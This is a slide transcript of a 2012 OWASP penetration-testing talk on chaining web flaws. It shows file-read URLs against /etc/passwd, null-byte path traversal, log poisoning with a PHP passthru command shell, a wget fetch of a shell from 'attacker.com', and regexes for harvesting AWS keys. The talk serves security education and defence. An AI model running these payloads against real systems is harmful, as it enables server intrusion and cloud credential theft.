• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Attack Chaining: Advanced Maneuvers for Hack Fu
 

Attack Chaining: Advanced Maneuvers for Hack Fu

on

  • 3,147 views

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a ...

Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.

Statistics

Views

Total Views
3,147
Views on SlideShare
3,071
Embed Views
76

Actions

Likes
3
Downloads
83
Comments
1

6 Embeds 76

http://www.redditmedia.com 60
http://iblunk.com 10
http://us-w1.rockmelt.com 2
http://www.linkedin.com 2
https://si0.twimg.com 1
https://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

11 of 1 previous next

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • Free Download : http://gg.gg/114bb
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Attack Chaining: Advanced Maneuvers for Hack Fu Attack Chaining: Advanced Maneuvers for Hack Fu Presentation Transcript

    • Attack ChainingAdvanced Maneuvers for Hack FuOWASP ATL31 May 2012
    • About Us WHO ARE THES DUDES? •  Rob •  Oscar Sr. Security Associate Security Associate @ Stach & Liu @ Stach & Liu 2  
    • Penetration Test vs.Vulnerability Assessment 3  
    • vs. 4  
    • Simulate a real worldattack against atarget network orapplication. - EVERYBODY 5  
    • It answers thequestion, “couldsomeone break in?” 6  
    • Penetration Testing Exploit & Penetrate InformationGathering 2 3 Escalate Privileges 1 Maintain 4a 4b Access Deny Access
    • Pen Testing Scenario •  Web application penetration test •  Cloud-based infrastructure hosts multiple sites •  Out-sourced PHP development to many contractors •  Determine attackers ability to compromise PII or infrastructure 8  
    • Step 1 – Explore 9  
    • Step 2 – Read Code http://vuln.com/dir/share.js ... AJAX.Call({ method:’POST’, url:’include/s_proxy.php’ ... 10  
    • Step 3 – Proxy? http://vuln.com/dir/include/s_proxy.php? redirect_url=http://www.google.com 11  
    • Step 4 – Read Local Files! http://vuln.com/dir/include/s_proxy.php? redirect_url=file:///etc/passwd 12  
    • Attack Chaining – Maneuver 1 13  
    • Attack Chaining – Maneuver 1 14  
    • Step 5 – Gather More Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/httpd.conf 15  
    • Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 16  
    • Step 6 – Keep Going… http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf <VirtualHost *> ServerName vuln.com  DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log </VirtualHost> 17  
    • Step 7 – Back to DirBuster 18  
    • Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php 19  
    • Step 8 – Review Code http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///var/www/sites/vuln.com/ docroot/dir/include/controller.php<?phprequire_once(includes/config.php);$module = !empty($_REQUEST[module]) ? $_REQUEST[module] :$config[module];$action = !empty($_REQUEST[action]) ? $_REQUEST[action] :$config[action];$currentModuleFile = modules/.$module./.$action..php;include($currentModuleFile)exit;?> 20  
    • Attack Chaining – Maneuver 2 21  
    • Attack Chaining – Maneuver 2 22  
    • Step 9 – Null Byte Injection http://vuln.com/dir/include/controller.php ?module=../../../../../../etc/passwd%00 23  
    • Step 8 – Review Codehttp://vuln.com/dir/include/s_proxy.php?redirect_url=file:///var/www/sites/vuln.com/docroot/dir/include/controller.php<?phprequire_once(includes/config.php);$module = !empty($_REQUEST[module]) ? $_REQUEST[module] :$config[module];$action = !empty($_REQUEST[action]) ? $_REQUEST[action] :$config[action];$currentModuleFile = modules/.$module./.$action..php;include($currentModuleFile)exit;?> 24  
    • Step 10 – Review Gathered Info http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf 25  
    • Step 10 – Back to Virtual Conf http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/conf/virtual.conf <VirtualHost *> ServerName vuln.com DocumentRoot /var/www/sites/vuln.com/docroot ErrorLog logs/vuln.com_error_log </VirtualHost> 26  
    • Step 11 – Where To Stick It? http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 27  
    • Step 12 – Poison Logs 28  
    • Step 12 – Poison Logs 29  
    • Step 12 – Poison Logs <? echo <pre>; passthru($_GET[cmd]); echo </pre>; ?> 30  
    • Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ 31  
    • Step 13 – PHP in the Log http://vuln.com/dir/include/s_proxy.php ?redirect_url=file:///etc/httpd/logs/vuln.com_ error_log [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat.jpg, referer: http://www.vuln.com/ [error] [client 10.10.65.18] File does not exist: /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: <? echo <pre>;passthru( $_GET[cmd]);echo <pre>; ?> 32  
    • Step 14 – Execute Code http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00&cmd=ls; /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 33  
    • Step 14 – Execute Code <? echo <pre>; passthru(ls); echo </pre>; ?> /var/www/sites/vuln.com/docroot/wp-content/themes/ lulzcat-attack.jpg, referer: controller.php example.php includes modules phpinfo.php … 34  
    • Attack Chaining – Maneuver 3 35  
    • Attack Chaining – Maneuver 3 36  
    • Step 15 – Upload Shell http://vuln.com/dir/include/controller.php ?module=/../../../../../../../../etc/httpd/ logs/vuln.com_error_log%00&cmd=wget%20http:// attacker.com/gny.php;   37  
    • Step 16 – Enjoy! 38  
    • Step 17 – I  want  more!ec2[^d]["][A-Z0-9]{20}["]ec2.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]ec2.*["][A-Z0-9]{20}["]ec2(D)*["][A-Z0-9]{20}["]amazon.*["][A-Z0-9]{20}["](amazon|ec2).*["][A-Z0-9]{20}["]amazon(D)*["][A-Z0-9]{20}["]access secret ["][A-Z0-9]{20}["] [A-Za-z0-9+/]{40}amazon.*["][A-Z0-9]{20}["].*["][A-Za-z0-9+/]{40}["]aws.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]amazon.*["][A-Z0-9]{20}["] ["][A-Za-z0-9+/]{40}["]secret.*["][A-Za-z0-9+/]{40}["]["][A-Za-z0-9+/]{40}["].*amazon 39  
    • Step 18 – Amazon  AWS  Regex$this-­‐>amazonService  =  new  Zend_Service_Amazon(DB3BAD768F2F11C7628,    $aws_key  =  8AFB5AF55D1E6620EE1;    define(AMAZON_KEY,  372B8E408D1484C538F);    if  (!defined(awsAccessKey))  define(awsAccessKey,  9F6EB7471C926194884);    //if  (!defined(awsAccessKey))  define(awsAccessKey,  4CAD89B86344CD8C26C);    define(AMAZON_AES_ACCESS_KEY_ID,  95C95B8DC84AA24C0EC);   40  
    • Step 19 – AWS  Takeover 41  
    • Step 20 – Make  It  Your  Own 42  
    • Cost of Amazon Cloud Compromise CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker launches 100 Extra Large Clusters$1,049,000 43  
    • Take Them Off The Web CRI TICAL EXPOSURE 1.  Found 8 Amazon Secret Keys to access Amazon S3 2.  Found that 2 of the 8 have administrator access to Amazon EC2 3.  Attacker shuts down and deletes all servers and backups permanentlyPRICELESS 44  
    • Attack Chaining – Hack Fu 45  
    • Attack Chaining – Hack Fu 46  
    • Why Is This Happening? 1.  Local File Include 4.  Insecure Credential •  File Read Only Storage •  Code Execution 5.  Overly Permissive 2.  Null Byte Injection Amazon AWS Keys 3.  Log Poisoning 6.  Sensitive Information Disclosure 47  
    • Web à Mass Malware Deployment 48  
    • Web à Data Center Compromise 49  
    • Web à Internal Network Compromise 50  
    • Internal Assessmentà SSN & Bank #’s 51  
    • Infrastructure Review 52  
    • Step 1 – Target Wireless 53  
    • Step 1 – Target Wireless 54  
    • Step 2 – Port Scan 55  
    • Step 3 – Test Default Creds 56  
    • Infrastructure Apocalypse 57  
    • Step 4 – Control AP 58  
    • Step 5 – Read All E-mail 59  
    • Step 6 – Listen To VOIP 60  
    • Step 7 – Open All Doors 61  
    • Step 7 – Open All Doors 62  
    • 63  
    • Step 7 – Server Room Door 64  
    • Is This Real Life? 1.  Insecure Wireless 4.  Weak Passwords Encryption 5.  Sensitive Information 2.  Improper Network Disclosure Segmentation 3.  Insecure Default Configuration 65  
    • Protection – How? 1.  People 2.  Policy 3.  Processes 4.  Strategic / Tactical Security 5.  Defense In-Depth 66  
    • Defense In-Depth I S P R O T E C T I O N A G A I N S T. . . 67  
    • How Do You Get Better? 68  
    • Synthesis and Patterns CAN BE BOTH GOOD AND BAD 69  
    • Attack Visualization LIKE BOBBY FISCHER 70  
    • Thank You 72